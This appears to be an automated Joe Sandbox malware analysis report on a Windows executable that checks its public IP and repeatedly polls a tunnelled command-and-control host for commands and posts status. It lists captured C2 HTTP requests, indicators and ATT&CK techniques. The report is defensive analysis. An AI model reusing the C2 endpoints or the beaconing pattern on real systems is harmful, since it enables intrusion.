Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
jgbC220X2U.exe

Overview

General Information

Sample name:jgbC220X2U.exe
renamed because original name is a hash value
Original sample name:f88fa3aa1dc3a59d1914254917c835783d84d384675f3622dde5aa7893952c96.exe
Analysis ID:1573000
MD5:28354f3e0d66d054bf0d05c3caf1e28a
SHA1:612fa801d24607511387c8e051bd6de9e0d26b9e
SHA256:f88fa3aa1dc3a59d1914254917c835783d84d384675f3622dde5aa7893952c96
Tags:exeloclx-iouser-JAMESWT_MHT
Infos:

Detection

Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May check the online IP address of the machine
PE file contains more sections than normal
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)

Classification

  • System is w10x64
  • jgbC220X2U.exe (PID: 1488 cmdline: "C:\Users\user\Desktop\jgbC220X2U.exe" MD5: 28354F3E0D66D054BF0D05C3CAF1E28A)
    • conhost.exe (PID: 6500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: http://pepwuecibr.eu.loclx.io/commandAvira URL Cloud: Label: phishing
Source: http://pepwuecibr.eu.loclx.ioAvira URL Cloud: Label: phishing
Source: http://pepwuecibr.eu.loclx.io/statusAvira URL Cloud: Label: phishing
Source: jgbC220X2U.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 4x nop then push rdi0_2_00007FF72A03AB9D
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 4x nop then mov rax, qword ptr [rbp+38h]0_2_00007FF72A06AA50
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 4x nop then sub rsp, 28h0_2_00007FF72A0C6B00
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 4x nop then push rsi0_2_00007FF72A042348
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 4x nop then push rsi0_2_00007FF72A04234D
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 4x nop then mov rax, qword ptr [rbp+38h]0_2_00007FF72A06A4D0
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 4x nop then lea rdx, qword ptr [rbp-31h]0_2_00007FF72A02A510
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 4x nop then push rbp0_2_00007FF729FDE2A0
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 4x nop then push r150_2_00007FF729FDA8B0
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 4x nop then push r140_2_00007FF72A0166C0
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 4x nop then sub rsp, 38h0_2_00007FF72A077BB0
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 4x nop then sub rsp, 38h0_2_00007FF72A0739B0
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 4x nop then mov rax, qword ptr [rbp+38h]0_2_00007FF72A06BF80
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 4x nop then mov rax, qword ptr [rbp+38h]0_2_00007FF72A06FF10
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 4x nop then mov rax, qword ptr [rbp+38h]0_2_00007FF72A06B3B0
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 4x nop then mov rax, qword ptr [rbp+38h]0_2_00007FF72A06F150
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 4x nop then mov rax, qword ptr [rbp+38h]0_2_00007FF72A06B1F0
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 4x nop then mov rax, qword ptr [rcx]0_2_00007FF729FD37E0
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 4x nop then push rsi0_2_00007FF72A077640
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 4x nop then lea rdx, qword ptr [rbp-31h]0_2_00007FF72A028FF0
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 4x nop then push rsi0_2_00007FF72A07CEC0
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 4x nop then jmp 00007FF72A041000h0_2_00007FF72A044348
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 4x nop then jmp 00007FF72A041000h0_2_00007FF72A04434D
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 4x nop then mov rax, qword ptr [rbp+10h]0_2_00007FF72A08C410
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 4x nop then mov rcx, rsi0_2_00007FF72A06844A
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 4x nop then mov rcx, rsi0_2_00007FF72A068457
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 4x nop then mov rcx, rsi0_2_00007FF72A0681F0
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 4x nop then push rdi0_2_00007FF72A0688B0
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 4x nop then mov rax, qword ptr [rbp+38h]0_2_00007FF72A06DB20
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 4x nop then jmp 00007FF72A01E8D0h0_2_00007FF72A021CE8
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 4x nop then jmp 00007FF72A01E8D0h0_2_00007FF72A021CED
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 4x nop then mov rax, qword ptr [rbp+10h]0_2_00007FF72A08D970
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 4x nop then push rdi0_2_00007FF72A04602A
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 4x nop then push r130_2_00007FF72A079E60
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 4x nop then push r130_2_00007FF72A079E60
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 4x nop then push r130_2_00007FF72A0793C0
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 4x nop then push r130_2_00007FF72A0793C0
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 4x nop then push rsi0_2_00007FF72A07D4E0
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 4x nop then push rdi0_2_00007FF72A03D12D
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 4x nop then lea rdx, qword ptr [rbp-31h]0_2_00007FF72A0AD1A0
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 4x nop then mov rax, qword ptr [rbp+38h]0_2_00007FF72A06D220
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 4x nop then push r120_2_00007FF72A0512B6
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 4x nop then push r120_2_00007FF72A0512B1
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 4x nop then push r150_2_00007FF72A00D520
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 4x nop then mov rcx, rsi0_2_00007FF72A0681F0
Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
Source: unknownDNS query: name: api.ipify.org
Source: unknownDNS query: name: api.ipify.org
Source: unknownDNS query: name: api.ipify.org
Source: unknownDNS query: name: api.ipify.org
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 0_2_00007FF72A0BFA30 recv,recv,0_2_00007FF72A0BFA30
Source: global trafficHTTP traffic detected: GET /?format=text HTTP/1.1User-Agent: cpp-httplib/0.18.0Accept: */*Host: api.ipify.orgConnection: close
Source: global trafficHTTP traffic detected: GET /command HTTP/1.1User-Agent: cpp-httplib/0.18.0Accept: */*Host: pepwuecibr.eu.loclx.ioConnection: close
Source: global trafficHTTP traffic detected: GET /?format=text HTTP/1.1User-Agent: cpp-httplib/0.18.0Accept: */*Host: api.ipify.orgConnection: close
Source: global trafficHTTP traffic detected: GET /command HTTP/1.1User-Agent: cpp-httplib/0.18.0Accept: */*Host: pepwuecibr.eu.loclx.ioConnection: close
Source: global trafficHTTP traffic detected: GET /?format=text HTTP/1.1User-Agent: cpp-httplib/0.18.0Accept: */*Host: api.ipify.orgConnection: close
Source: global trafficHTTP traffic detected: GET /command HTTP/1.1User-Agent: cpp-httplib/0.18.0Accept: */*Host: pepwuecibr.eu.loclx.ioConnection: close
Source: global trafficHTTP traffic detected: GET /?format=text HTTP/1.1User-Agent: cpp-httplib/0.18.0Accept: */*Host: api.ipify.orgConnection: close
Source: global trafficHTTP traffic detected: GET /command HTTP/1.1User-Agent: cpp-httplib/0.18.0Accept: */*Host: pepwuecibr.eu.loclx.ioConnection: close
Source: global trafficHTTP traffic detected: GET /?format=text HTTP/1.1User-Agent: cpp-httplib/0.18.0Accept: */*Host: api.ipify.orgConnection: close
Source: global trafficHTTP traffic detected: GET /command HTTP/1.1User-Agent: cpp-httplib/0.18.0Accept: */*Host: pepwuecibr.eu.loclx.ioConnection: close
Source: global trafficHTTP traffic detected: GET /?format=text HTTP/1.1User-Agent: cpp-httplib/0.18.0Accept: */*Host: api.ipify.orgConnection: close
Source: global trafficHTTP traffic detected: GET /command HTTP/1.1User-Agent: cpp-httplib/0.18.0Accept: */*Host: pepwuecibr.eu.loclx.ioConnection: close
Source: global trafficHTTP traffic detected: GET /?format=text HTTP/1.1User-Agent: cpp-httplib/0.18.0Accept: */*Host: api.ipify.orgConnection: close
Source: global trafficHTTP traffic detected: GET /command HTTP/1.1User-Agent: cpp-httplib/0.18.0Accept: */*Host: pepwuecibr.eu.loclx.ioConnection: close
Source: global trafficHTTP traffic detected: GET /?format=text HTTP/1.1User-Agent: cpp-httplib/0.18.0Accept: */*Host: api.ipify.orgConnection: close
Source: global trafficHTTP traffic detected: GET /command HTTP/1.1User-Agent: cpp-httplib/0.18.0Accept: */*Host: pepwuecibr.eu.loclx.ioConnection: close
Source: global trafficHTTP traffic detected: GET /?format=text HTTP/1.1User-Agent: cpp-httplib/0.18.0Accept: */*Host: api.ipify.orgConnection: close
Source: global trafficHTTP traffic detected: GET /command HTTP/1.1User-Agent: cpp-httplib/0.18.0Accept: */*Host: pepwuecibr.eu.loclx.ioConnection: close
Source: global trafficHTTP traffic detected: GET /?format=text HTTP/1.1User-Agent: cpp-httplib/0.18.0Accept: */*Host: api.ipify.orgConnection: close
Source: global trafficHTTP traffic detected: GET /command HTTP/1.1User-Agent: cpp-httplib/0.18.0Accept: */*Host: pepwuecibr.eu.loclx.ioConnection: close
Source: global trafficHTTP traffic detected: GET /?format=text HTTP/1.1User-Agent: cpp-httplib/0.18.0Accept: */*Host: api.ipify.orgConnection: close
Source: global trafficHTTP traffic detected: GET /command HTTP/1.1User-Agent: cpp-httplib/0.18.0Accept: */*Host: pepwuecibr.eu.loclx.ioConnection: close
Source: global trafficHTTP traffic detected: GET /?format=text HTTP/1.1User-Agent: cpp-httplib/0.18.0Accept: */*Host: api.ipify.orgConnection: close
Source: global trafficHTTP traffic detected: GET /command HTTP/1.1User-Agent: cpp-httplib/0.18.0Accept: */*Host: pepwuecibr.eu.loclx.ioConnection: close
Source: global trafficHTTP traffic detected: GET /?format=text HTTP/1.1User-Agent: cpp-httplib/0.18.0Accept: */*Host: api.ipify.orgConnection: close
Source: global trafficHTTP traffic detected: GET /command HTTP/1.1User-Agent: cpp-httplib/0.18.0Accept: */*Host: pepwuecibr.eu.loclx.ioConnection: close
Source: global trafficHTTP traffic detected: GET /?format=text HTTP/1.1User-Agent: cpp-httplib/0.18.0Accept: */*Host: api.ipify.orgConnection: close
Source: global trafficHTTP traffic detected: GET /command HTTP/1.1User-Agent: cpp-httplib/0.18.0Accept: */*Host: pepwuecibr.eu.loclx.ioConnection: close
Source: global trafficDNS traffic detected: DNS query: api.ipify.org
Source: global trafficDNS traffic detected: DNS query: pepwuecibr.eu.loclx.io
Source: unknownHTTP traffic detected: POST /status HTTP/1.1Content-Length: 39User-Agent: cpp-httplib/0.18.0Accept: */*Host: pepwuecibr.eu.loclx.ioConnection: closeContent-Type: application/json
Source: jgbC220X2U.exeString found in binary or memory: http://api.ipify.org
Source: jgbC220X2U.exeString found in binary or memory: http://api.ipify.org/?format=textUnknown
Source: jgbC220X2U.exeString found in binary or memory: http://pepwuecibr.eu.loclx.io
Source: jgbC220X2U.exe, 00000000.00000002.3289657421.00000248F1DE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.
Source: jgbC220X2U.exe, 00000000.00000002.3289536896.00000089B8FF9000.00000004.00000010.00020000.00000000.sdmp, jgbC220X2U.exe, 00000000.00000002.3289657421.00000248F1DE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Nunito:700
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 0_2_00007FF729FB2050 ntohs,ntohs,getnameinfo,0_2_00007FF729FB2050
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 0_2_00007FF729FA54500_2_00007FF729FA5450
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 0_2_00007FF729FCECA00_2_00007FF729FCECA0
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 0_2_00007FF729FF6CFE0_2_00007FF729FF6CFE
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 0_2_00007FF729FF2AB00_2_00007FF729FF2AB0
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 0_2_00007FF729F8AFA00_2_00007FF729F8AFA0
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 0_2_00007FF729FE30B00_2_00007FF729FE30B0
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 0_2_00007FF72A0A6EA00_2_00007FF72A0A6EA0
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 0_2_00007FF729F8EF160_2_00007FF729F8EF16
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 0_2_00007FF729FCE3800_2_00007FF729FCE380
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 0_2_00007FF729FF21500_2_00007FF729FF2150
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 0_2_00007FF729FDE2A00_2_00007FF729FDE2A0
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 0_2_00007FF729FD63000_2_00007FF729FD6300
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 0_2_00007FF729FEE8150_2_00007FF729FEE815
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 0_2_00007FF729FDA8B00_2_00007FF729FDA8B0
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 0_2_00007FF729FFE9000_2_00007FF729FFE900
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 0_2_00007FF729FFA7110_2_00007FF729FFA711
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 0_2_00007FF729FF7B7E0_2_00007FF729FF7B7E
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 0_2_00007FF729FFBFB00_2_00007FF729FFBFB0
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 0_2_00007FF729F93FFA0_2_00007FF729F93FFA
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 0_2_00007FF729FEBD530_2_00007FF729FEBD53
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 0_2_00007FF729FF3DD00_2_00007FF729FF3DD0
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 0_2_00007FF729FFF3400_2_00007FF729FFF340
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 0_2_00007FF729FF34800_2_00007FF729FF3480
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 0_2_00007FF729FD75100_2_00007FF729FD7510
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 0_2_00007FF729FE32700_2_00007FF729FE3270
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 0_2_00007FF729FFB5900_2_00007FF729FFB590
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 0_2_00007FF729FEF6CA0_2_00007FF729FEF6CA
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 0_2_00007FF72A068B300_2_00007FF72A068B30
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 0_2_00007FF729FECB930_2_00007FF729FECB93
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 0_2_00007FF729FF89DE0_2_00007FF729FF89DE
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 0_2_00007FF729FFC9F00_2_00007FF729FFC9F0
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 0_2_00007FF729FF0EB00_2_00007FF729FF0EB0
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 0_2_00007FF72A0103E00_2_00007FF72A0103E0
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 0_2_00007FF729FD84C00_2_00007FF729FD84C0
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 0_2_00007FF729FDC2500_2_00007FF729FDC250
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 0_2_00007FF729F848C00_2_00007FF729F848C0
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 0_2_00007FF729FF05200_2_00007FF729FF0520
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 0_2_00007FF729FA46900_2_00007FF729FA4690
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 0_2_00007FF729FED9B30_2_00007FF729FED9B3
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 0_2_00007FF729FE1FE00_2_00007FF729FE1FE0
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 0_2_00007FF72A0120800_2_00007FF72A012080
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 0_2_00007FF729FCDE100_2_00007FF729FCDE10
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 0_2_00007FF729FE1E200_2_00007FF729FE1E20
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 0_2_00007FF729FFDE600_2_00007FF729FFDE60
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 0_2_00007FF729FF5EB00_2_00007FF729FF5EB0
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 0_2_00007FF729F853600_2_00007FF729F85360
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 0_2_00007FF729FFD4100_2_00007FF729FFD410
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 0_2_00007FF729FDD2900_2_00007FF729FDD290
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 0_2_00007FF729FF18000_2_00007FF729FF1800
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 0_2_00007FF72A00D5200_2_00007FF72A00D520
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: String function: 00007FF72A075680 appears 138 times
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: String function: 00007FF72A0B3870 appears 41 times
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: String function: 00007FF72A0B4720 appears 158 times
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: String function: 00007FF72A076010 appears 126 times
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: String function: 00007FF72A0C4650 appears 75 times
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: String function: 00007FF72A0C44B0 appears 50 times
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: String function: 00007FF72A0C4780 appears 166 times
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: String function: 00007FF72A0C65D0 appears 103 times
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: String function: 00007FF72A0577D0 appears 182 times
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: String function: 00007FF72A0C66C0 appears 103 times
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: String function: 00007FF72A0C4B10 appears 43 times
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: String function: 00007FF72A071D40 appears 50 times
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: String function: 00007FF72A069B50 appears 129 times
Source: jgbC220X2U.exeStatic PE information: Number of sections : 20 > 10
Source: classification engineClassification label: mal48.winEXE@2/1@4/3
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6500:120:WilError_03
Source: jgbC220X2U.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\jgbC220X2U.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\jgbC220X2U.exe "C:\Users\user\Desktop\jgbC220X2U.exe"
Source: C:\Users\user\Desktop\jgbC220X2U.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\jgbC220X2U.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\jgbC220X2U.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\jgbC220X2U.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\jgbC220X2U.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\jgbC220X2U.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\jgbC220X2U.exeSection loaded: fwpuclnt.dllJump to behavior
Source: jgbC220X2U.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
Source: jgbC220X2U.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: jgbC220X2U.exeStatic file information: File size 7131898 > 1048576
Source: jgbC220X2U.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x146800
Source: jgbC220X2U.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 0_2_00007FF729F815E0 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00007FF729F815E0
Source: jgbC220X2U.exeStatic PE information: section name: /4
Source: jgbC220X2U.exeStatic PE information: section name: .xdata
Source: jgbC220X2U.exeStatic PE information: section name: /14
Source: jgbC220X2U.exeStatic PE information: section name: /29
Source: jgbC220X2U.exeStatic PE information: section name: /41
Source: jgbC220X2U.exeStatic PE information: section name: /55
Source: jgbC220X2U.exeStatic PE information: section name: /67
Source: jgbC220X2U.exeStatic PE information: section name: /80
Source: jgbC220X2U.exeStatic PE information: section name: /91
Source: jgbC220X2U.exeStatic PE information: section name: /107
Source: jgbC220X2U.exeStatic PE information: section name: /123
Source: C:\Users\user\Desktop\jgbC220X2U.exeAPI coverage: 2.2 %
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: jgbC220X2U.exe, 00000000.00000002.3289657421.00000248F1DE8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 0_2_00007FF729F9AB32 IsDebuggerPresent,RaiseException,0_2_00007FF729F9AB32
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 0_2_00007FF729F815E0 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00007FF729F815E0
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 0_2_00007FF729F81154 Sleep,_initterm,_initterm,SetUnhandledExceptionFilter,_set_invalid_parameter_handler,exit,_cexit,0_2_00007FF729F81154
Source: C:\Users\user\Desktop\jgbC220X2U.exeCode function: 0_2_00007FF729F9EAC0 _errno,GetSystemTimeAsFileTime,GetSystemTimeAsFileTime,_errno,0_2_00007FF729F9EAC0
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Native API
1
DLL Side-Loading
1
Process Injection
1
Process Injection
OS Credential Dumping1
System Time Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
1
Deobfuscate/Decode Files or Information
LSASS Memory11
Security Software Discovery
Remote Desktop ProtocolData from Removable Media2
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
Obfuscated Files or Information
Security Account Manager1
System Network Configuration Discovery
SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading
NTDS2
System Information Discovery
Distributed Component Object ModelInput Capture3
Application Layer Protocol
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
jgbC220X2U.exe5%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://pepwuecibr.eu.loclx.io/command100%Avira URL Cloudphishing
http://pepwuecibr.eu.loclx.io100%Avira URL Cloudphishing
http://pepwuecibr.eu.loclx.io/status100%Avira URL Cloudphishing
https://fonts.googleapis.0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
eu.loclx.io
167.99.38.229
truefalse
    unknown
    api.ipify.org
    172.67.74.152
    truefalse
      high
      pepwuecibr.eu.loclx.io
      unknown
      unknownfalse
        unknown
        NameMaliciousAntivirus DetectionReputation
        http://pepwuecibr.eu.loclx.io/statusfalse
        • Avira URL Cloud: phishing
        unknown
        http://pepwuecibr.eu.loclx.io/commandfalse
        • Avira URL Cloud: phishing
        unknown
        http://api.ipify.org/?format=textfalse
          high
          NameSourceMaliciousAntivirus DetectionReputation
          https://fonts.googleapis.jgbC220X2U.exe, 00000000.00000002.3289657421.00000248F1DE8000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://pepwuecibr.eu.loclx.iojgbC220X2U.exefalse
          • Avira URL Cloud: phishing
          unknown
          http://api.ipify.org/?format=textUnknownjgbC220X2U.exefalse
            high
            http://api.ipify.orgjgbC220X2U.exefalse
              high
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              167.99.38.229
              eu.loclx.ioUnited States
              14061DIGITALOCEAN-ASNUSfalse
              104.26.12.205
              unknownUnited States
              13335CLOUDFLARENETUSfalse
              172.67.74.152
              api.ipify.orgUnited States
              13335CLOUDFLARENETUSfalse
              Joe Sandbox version:41.0.0 Charoite
              Analysis ID:1573000
              Start date and time:2024-12-11 11:28:06 +01:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 5m 22s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:5
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:jgbC220X2U.exe
              renamed because original name is a hash value
              Original Sample Name:f88fa3aa1dc3a59d1914254917c835783d84d384675f3622dde5aa7893952c96.exe
              Detection:MAL
              Classification:mal48.winEXE@2/1@4/3
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:
              • Successful, ratio: 98%
              • Number of executed functions: 15
              • Number of non-executed functions: 162
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
              • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.175.87.197
              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • Not all processes where analyzed, report is missing behavior information
              • VT rate limit hit for: jgbC220X2U.exe
              No simulations
